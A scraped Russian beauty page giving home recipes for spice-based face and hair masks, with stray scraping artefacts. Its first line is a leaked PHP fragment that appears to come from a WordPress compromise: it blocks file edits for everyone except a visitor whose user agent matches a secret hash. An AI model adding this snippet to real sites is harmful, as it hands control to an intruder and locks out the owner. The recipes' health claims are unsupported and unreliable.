if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как можно использовать специи для ухода за лицом и волосами. Рецепты масок и кремов | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как можно использовать специи для ухода за лицом и волосами. Рецепты масок и кремов

Мало кто задумывался над тем, где еще можно использовать специи, кроме как для создания вкуснейших кулинарных блюд. А ведь специи еще с древних времен входили в состав многих лекарственных и косметических средств.

Мало кто заду­мы­вал­ся над тем, где еще мож­но исполь­зо­вать спе­ции, кро­ме как для созда­ния вкус­ней­ших кули­нар­ных блюд. А ведь спе­ции еще с древ­них вре­мен вхо­ди­ли в состав мно­гих лекар­ствен­ных и кос­ме­ти­че­ских средств. Уход за воло­са­ми и кожей у восточ­ных жен­щин осо­бен­но часто вклю­ча­ет исполь­зо­ва­ние в сво­ем соста­ве раз­лич­но­го рода спе­ций. Попро­бу­ем и мы после­до­вать их при­ме­ру и вос­поль­зо­вать­ся новы­ми рецеп­та­ми красоты.

Куркума

333

Эта цвет­ная спе­ция обла­да­ет отлич­ным про­ти­во­вос­па­ли­тель­ным и анти­био­ти­че­ским дей­стви­ем, но при исполь­зо­ва­нии масок с добав­ле­ни­ем кур­ку­мы сто­ит хоро­шо их смы­вать, так как она явля­ет­ся хоро­шим красителем.

Мас­ка для лица

Нуж­но сме­шать мед с порош­ком кур­ку­мы в оди­на­ко­вых про­пор­ци­ях и нане­сти на 10 минут на кожу. Будь­те акку­рат­ны, если у вас аллер­гия на ингре­ди­ен­ты маски.

Корица

А эта спе­ция хоро­шо очи­ща­ет кожу и сти­му­ли­ру­ет при­ток кро­ви, обла­да­ет анти­ок­си­дант­ны­ми свой­ства­ми. Поэто­му лечеб­ная кос­ме­ти­ка все чаще изго­тав­ли­ва­ет­ся с при­ме­не­ни­ем корицы.

Мас­ка для волос

Возь­ми­те по две сто­ло­вые лож­ки кефи­ра и олив­ко­во­го мас­ла, по 1 ч. лож­ке меда и кори­цы, добавь­те 1 сырой жел­ток. Мас­ка с кори­цей нано­сит­ся не более чем на 20 мин. и смы­ва­ет­ся шампунем.

Имбирь

Имбирь счи­та­ет­ся пре­крас­ным анти­сеп­ти­ком, упо­треб­ля­ет­ся для улуч­ше­ния обме­на веществ в пищу, исполь­зу­ет­ся в соста­ве кос­ме­ти­че­ских масок.

Мас­ка для лица

Еже­не­дель­ный уход за кожей лица дол­жен содер­жать сле­ду­ю­щую мас­ку: 4 кап­ли имбир­но­го мас­ла, 1 ст. лож­ку мас­ла жожо­ба хоро­шо пере­ме­шать и нане­сти на лицо на 10 мин., сте­реть салфеткой.

222

Мас­ка для волос

Мас­ка из 15–20 мл олив­ко­во­го мас­ла и 4 кап­ля­ми имби­ря нано­сит­ся на воло­сы на 15 мин. и тща­тель­но смы­ва­ет­ся шампунем.

Кардамон

Смесь про­тив целлюлита

Еже­днев­но вти­рать в участ­ки, пора­жен­ные цел­люли­том, смесь из 10 капель масел чай­но­го дере­ва и кар­да­мо­на и 30 гр. олив­ко­во­го масла.

Мас­ка для увя­да­ю­щей кожи

Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми на осно­ве кар­да­мо­на отлич­но под­тя­ги­ва­ет кожу и омо­ла­жи­ва­ет ее. Рецепт такой мас­ки доволь­но прост: сме­шай­те мас­ла мин­даль­ное аво­ка­до, розо­вое и кар­да­мо­на в про­пор­ци­ях 3:2:5:3 и нане­си­те на лицо на 20 мин.

Гвоздика

Гвоз­ди­ка по пра­ву счи­та­ет­ся хоро­шим анти­сеп­ти­ком и укре­пи­те­лем волос, поэто­му домаш­няя бес­плат­ная кос­ме­ти­ка не пре­не­бре­га­ет добав­ле­ни­ем в свой состав этой заме­ча­тель­ной специи.

Мас­ка, укреп­ля­ю­щая волосы

Нуж­но измель­чить 5 буто­нов гвоз­дич­ки, сме­шать со ста­ка­ном вод­ки и луко­вой шелу­хой (1–1,5 ст.). Насто­ять 2 неде­ли в тем­ном поме­ще­нии и вти­рать в кожу голо­вы на пол­ча­са перед мытьем волос.

Черный перец

Исполь­зо­ва­ние насто­ек из чер­но­го пер­ца реко­мен­до­ва­но как основ­ной уход за воло­са­ми, так как эта жгу­чая спе­ция отлич­но улуч­ша­ет кровообращение.

Мас­ка для волос

За пол­ча­са до основ­но­го мытья волос вти­рай­те в кожу голо­вы каши­цу из моло­то­го чер­но­го пер­ца и соли, немно­го раз­бав­лен­ную луко­вым соком.

Помни­те, что зача­стую бес­плат­ная кос­ме­ти­ка в домаш­них усло­ви­ях помо­га­ет спра­вить­ся даже с таки­ми про­бле­ма­ми, перед кото­ры­ми порой бес­силь­ны доро­го­сто­я­щие кос­ме­ти­че­ские средства.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!